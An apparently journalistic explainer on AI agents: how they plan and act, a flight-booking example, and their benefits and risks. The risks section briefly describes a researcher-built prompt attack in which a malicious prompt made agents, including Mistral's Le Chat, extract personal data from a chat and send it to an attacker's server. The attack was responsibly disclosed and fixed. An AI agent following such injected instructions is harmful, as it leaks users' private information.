The artificial intelligence world is abuzz with talk of AI agents. Microsoft recently released a set of autonomous agents that could help streamline customer service, sales, and supply chain tasks. Similarly, OpenAI unveiled Swarm, an experimental framework to explore better coordination between multi-agent systems. Meanwhile, Claude, the large language model (LLM) from Anthropic, is taking agentic AI to the next level with the beta stage of its computer use skills—from moving a mouse cursor around the screen to clicking buttons and typing text using a virtual keyboard.
So, what exactly are AI agents?
“AI agents are advanced artificial intelligence systems that are able to complete a task or make a decision,” says Adnan Ijaz, director of product management for Amazon Q Developer, an AI-powered software development assistant from Amazon Web Services (AWS). “Humans set the goal, and agents figure out on their own, autonomously, the best course of action.” The agents can interface with external systems to take action in the world.
In addition to this autonomy, agentic AI can also receive feedback and continually improve on a task, says Yoon Kim, an assistant professor at MIT’s Computer Science and Artificial Intelligence Laboratory.
Think of AI agents as a more capable version of generative AI. While both technologies rely on LLMs as their underlying model, generative AI creates new content based on the patterns it learned from its training data. Agentic systems, on the other hand, are not only able to generate content but are also able to take action based on the information they gain from their environment. “So all of that is essentially a step further than generative AI,” Ijaz says.
How AI Agents Work
To fulfill a particular task, AI agents usually follow a three-part workflow. First, they determine the goal through a user-specified prompt. Next, they figure out how to approach that objective by breaking it down into smaller, simpler subtasks and collecting the needed data. Finally, they execute tasks using what’s contained in their knowledge base plus the data they’ve amassed, making use of any functions they can call or tools they have at their disposal.
RELATED: AI Prompt Engineering Is Dead
Let’s take booking flights as an example, and imagine a prompt to “book the cheapest flight from A to B on Y date.” An AI agent might first search the web for all flights from A to B on Y date, scan the search results, and select the lowest-priced flight. The agent then calls a function that connects to the application programming interface (API) of the airline’s flight booking platform. The agent makes a booking for the chosen flight, entering the user’s details based on the information stored in its knowledge base.
“The key point of agentic interaction is that the system is able to understand the goal you’re trying to accomplish and then operate on it autonomously,” says Ijaz. However, humans are still in the loop, guiding the process and intervening when required. For instance, the flight-booking AI agent might be instructed to notify the user if the cheapest flight has no available seats, allowing the user to decide on the next step. “If at any point humans don’t think the system is going in the right direction, they can override it—they have control,” Ijaz adds.
Promises and Pitfalls of Agentic AI
Much like generative AI, agentic AI holds the promise of increased efficiency and improved productivity, with the agent performing mundane tasks that would otherwise be tedious or repetitive for the average human.
“If these systems become trustworthy enough, then we could have agents arrange a calendar for you or reserve restaurants on your behalf—do stuff that you would otherwise have an assistant do,” says Kim.
The keyword there is trustworthy, with data privacy and security as major challenges for agentic AI. “Agents are looking at a large swath of data. They are reasoning over it, they’re collecting that data. It’s important that the right privacy and security guardrails are implemented,” Ijaz says.
For instance, researchers at the University of California San Diego and Nanyang Technological University in Singapore were able to trick AI agents into improper tool use. They created a malicious prompt attack that analyzes a user’s chat session, pulls out personally identifiable information, and formats it into a command that leaks the data to an attacker’s server. The attack worked on Mistral AI’s Le Chat conversational assistant, so the researchers disclosed the security vulnerability to the company, which resulted in a product fix.
Factual accuracy is another issue for AI agents, since they’re built on LLMs that have a problem with hallucinations—the technical term for making things up. Kim notes that while it certainly wouldn’t be desirable to have an AI agent give you the wrong information about flights, such a mistake probably wouldn’t be disastrous. “That’s not as high stakes an application as employing these types of systems in clinical or financial settings,” Kim says, “where the accuracy or lack thereof of the outputs or actions could have serious consequences.”
Agentic AI is still in its early stages, and as AI agents evolve, they’ll hopefully make people’s lives easier and more productive. But caution is still recommended for the risks they pose. “It’s an important advancement, so I think all the attention it’s getting is warranted,” Ijaz says. “Agents are another tool in the armory for humans, and humans will put those tools to good use granted that we build those agents in ways that follow responsible AI practices.”
Rina Diane Caballar is a writer covering tech and its intersections with science, society, and the environment. An IEEE Spectrum Contributing Editor, she's a former software engineer based in Wellington, New Zealand.